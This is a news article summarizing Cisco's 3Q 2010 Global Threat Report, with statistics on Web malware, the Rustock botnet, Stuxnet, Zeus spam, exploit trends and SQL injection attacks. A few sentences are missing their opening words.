Cisco's Global Threat Report examines the most prevalent Web malware, e-mail attacks, exploits and other cyber-crime incidents from July to September 2010.
Botnet activity, malicious spam and resurgence of SQL
injection attacks were some of the most significant cyber-crime threats during
the third quarter of 2010, according to a multiteam report from Cisco released
According to the report, enterprise users experienced an
average of 133 Web malware encounters per month. August was the most prolific,
peaking to more than 140 malware encounters, Cisco researchers said. Spam volumes
were also the highest in August, compared to the rest of the quarter.
botnet was the most frequently encountered, according to Cisco Remote
Operations Services, who remotely monitor, alert, and remediate threats for
enterprise customers. The botnet is believed to be one of the largest sources
of spam, especially pharmaceutical spam, said Mary Landesman, market
intelligence manager at Cisco. Rustock activity peaked in late August 2010, and
declined in September, the researchers said.
In fact, pharmaceutical and chemical industries were most
at risk for Web malware in the third quarter, according to the report, followed
by energy and oil, and agriculture and mining. The least at risk were the
aviation and automotive industries.
Cisco ROS also reported that Stuxnet exploiting the
Windows Print Spooler vulnerability was the "fifth most prevalent event" the
team detected during the quarter. Rustock was the most prevalent, accounting
for 21 percent of all events handled by ROS, compared to Stuxnet's five
percent, during the third quarter.
Stuxnet hit the United Kingdom the most, with 38 percent of
users affected in that region, followed by 25 percent in Hong Kong.
The volume of spam dropped in September for eight of the
top 10 countries, but the amount of spam sent increased for Russia and the
Ukraine, according to the report.
spam spreading the Zeus
Trojan dominated September activity, accounting for 31.26 percent of all
spam during that period.
The report examined the "Here You Have" e-mail worm
outbreak, noting that 79 percent of the clicks occurred during the first three
hours of the worm's spread and that it accounted for 10 percent of total spam
volume before it was taken offline.
The most common exploits during the first half of 2010
was those targeting Adobe Reader, Acrobat, Sun Java, and Adobe Flash, according
to Cisco. That trend held true for Sun Java, as exploits targeting that
application platform increased from five percent of all malware encounters in
July to seven percent in September, said Landesman.
However, despite reports of various PDF-related threats
during the quarter, attacks targeting Adobe Reader and Acrobat actually
declined over the quarter, said Landesman.
Cisco IPS reported four types of SQL infection attacks,
including encoded words embedded within HTTP requests, causing a stack overflow
in MSSQL, generic SQL keywords within HTTP, and SQL injection attacks from the
Asprox botnet. The botnet recurred briefly in the first half of August,
according the report, targeting Web sites using ASP.
Approximately 10 percent of Web malware was encountered
engine traffic and services, researchers found. Over seven percent of Web
malware encounters resulted from Google referrers, followed by Yahoo at two
percent and Bing at one percent.
3Q10 Global Threat Report covers the third quarter, from July 1 to Sept.
30. The report contains information from multiple Cisco teams, including Cisco
Remote Management Services, Cisco IPS, Cisco IronPort for e-mail security, and
ScanSafe for Web security, according to Landesman.